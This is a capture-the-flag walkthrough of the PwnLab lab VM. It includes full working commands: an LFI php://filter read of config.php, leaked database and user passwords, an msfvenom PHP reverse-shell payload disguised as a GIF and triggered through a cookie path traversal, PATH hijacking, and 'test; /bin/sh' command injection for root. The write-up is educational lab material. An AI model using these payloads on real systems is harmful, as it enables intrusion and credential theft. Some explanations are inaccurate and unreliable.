Penetration Testing in PwnLab (CTF Challenge)

In this article we will walkthrough a root2boot penetration testing challenge i.e PwnLab. PwbLab is a vulnerbale framework, based on the concept of CTF (capture the flag), with a bit of security which is a little complicated to bypass. But it’s not impossible. So, let us learn how we can get its access.

Download From Here

Now to start let us, firstly, consider that we do not know the IP of the PwnLab, therefore search for the IP address before hand and for that there is a command that shows us all the IP’s present in our network, so go to the terminal of you Kali and type :

netdiscover

Target IP = 192.168.0.105

And to know that we start our penetration testing. So, first, we will now scan with nmap, we will apply an aggressive scan as it gives detailed information and is fast. The command is :

nmap -A 192.168.0.105

We have the result of scanning and as you can see there are only three ports open and they are: 80, 111, 3306.

Our target IP is 192.168.0.105 as its MAC Vendor is VMware. It is our best shot but also to be sure let us check this IP on our browser. We can crosscheck it from our browser as port number 80 is opened i.e it can open in browser. In the browser we can see that PwnLab has three pages: home, login and upload. To enter the server we have to upload our code into it and for we must know username and password.

As we need to know about username and password, we will use nikto command to find out the file which is storing them. Nikto helps us to know all the file names and the data they are containing. And the command to for this is:

nikto -h 192.168.0.105

As you can see /config.php: PHP Config file may contain database IDs and password is the file that has username and passwords. Now that we know the file name we can use curl command to find out the data of the file.

Curl is a computer software project providing a library and command-line tool for transferring data using various protocols. The cURL project produces two products, libcurl and cURL. It was first released in 1997. The name originally stood for “see URL”.

And the curl comand is:

curl http://192.168.0.105/index.php?page=php://filter/convert.base64-encode/resource=config

And the highlighted part into he above image is our result and has the information about username and passwords. But note that the information is in base64 code which we will have to decode in order to read it.

And to decode it we will use HackBar. HackBar is an add-on of Mozilla that contains various functions but the most important one is that it helps us to encode and decode base64 codes.

To decode copy the string and go to hackbar and click on encoding option. A drop down menu will appear, now select decode option.

A dialog box will open, paste the copied string on the text box and click on OK.

The decoded result will appear in your hackbar in a readable form. And this way you will have your username and password.

So, the username is root and password is H4u%QJ_H99.

Now we use sql command to see the username and passwords. And the sql command is:

mysql -h 192.168.0.105 -u root -p Users

After typing the command it ask the password, so here enter the decoded password and press enter.

And so, you will have the usernames and password as in this case the usernames are kent, mike, kane with their passwords. These passwords are in base64 code and to decode it use the hackbar as we used earlier. Also shown below:

And like this we will have our password.

Now that we have our username and password, we need to create a php file that we will upload. This raw file we will make through msfvenom. And the command is:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4444 -f raw

Once the file is generated copy the code from <?php to die(); And past it in a text file and after that change its extension to .php

Now if you try to upload this file you will get an error saying that not allowed extension, please upload images only. So, therefore, you will need change the extension of your .php file.

Before changing the extension you need to add GIF98 at the top of the code as shown below, also change the extension to .gif

After changing the extension when you will try to upload the file you will succeed.

Once the file is uploaded, we still need a way to execute this file. And for that right click on that file and click on copy image location option.

As of now you have copied image location, now you need to install Tamper Data. Tamper Data is a Firefox Extension which gives you the power to view record and even modify outgoing HTTP requests. It helps you to capture cookies and http requests.

Open Tamper Data and click on Start Tamper.

A dialog box will appear. From it clicks on Tamper button on the right corner.

By doing so a dialog box will appear. Keep this dialog box open in the background and open metasploit meanwhile

After opening metasploit type:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.106

set lport 4444

exploit

Running the above commands will helps you gain a meterpreter session of the lab.

Now go to that dialog box of tamper data which was open in the background. In the dialog box you can see there is a option of cookie. In the adjacent text box to the cookie option delete whatever was written and type:

lang=../*Image location path*

Here,

*image location path* is the path of the file that you uploaded and had copied it after that.

By doing so you are commanding tamper data to execute your own malicious file instead of running its code which helps us to capture the cookies. After giving the path, the second you will click on OK, you will have you meterpreter session.

But this is not enough as we still need to bypass admin. And if you go to the shell of the lab and try to switch user, you will note that the command will show error. To gain the full access of PwnLab you will still need to follow some commands. So, therefore, type:

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

The execution of the command will take you inside the PwnLab and if you try to switch the user; you wil succeed. To switch the user command is:

su kane

iSv5Ym2GRo

Here,

su –> denotes the switch user

kane –> the user you want to switch to

iSv5Ym2GRo –> is the password

After the execution g of it, you will enter the user kane.

Next, if you type ls command you will that there is a folder named home in the user that we just entered. So, will go into that folder and to do so, type;

cd home

As you have entered the home folder, type:

 ls -lsa

This command will show you all the users in the home ith all the details. So, now t hat you know how many users are t heir and what are their usernames, go back to kane user and for that type :

cd kane (this command will bring you back to the kane user)

ls -lsa (this command will list all the folders present in the kane)

As you can see in the image below, there is file in kane user called msgmike.  Let us try to open it and therefore, type :

./msgmike

If you try to open it, it will give you error saying such file doesn’t exist. So, now let us change user and see if we can open this file from another user type :

cd ..

cd kent

cd mike

You can see that permission to every other user is denied. So now, type:

echo ” /bin/bash” > cat

chmod 777cat

With theses above commands we are using cat command which allows us to create single or multiple files, view contain of file, concatenate files and redirect output in terminal or files. After creating the file we are giving it permission to access through chmod command.

Then further type:

export PATH=. : $PATH

./msgmike

Once the above command is executed, we will have access to msgmike file as we desired and have entered other user named mike. Now if you type:

id

You will see that the above command will show you all the users and will also inform you which administrator user is.

Now that you are in the user mike open the home folder and then go to mike folder. And the type:

./msg2root

test; /bin/sh

id ( this command will show you the users)

whoami (this command will tell you that you are the administrator)

ls (it will show the list of files in the root)

cat flag.txt ( this command will execute flag.txt which was our main motive)

This was an excellent challenge. It requires us to think outside of the box, correlate findings, and manually validate vulnerabilities. This was a good example of the importance of manual methods, as no automated vulnerability scanner would have disclosed the flaws found during this engagement. This challenge also demonstrates the importance of validating user input. 

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

Related Posts Plugin for WordPress, Blogger...

Leave a Reply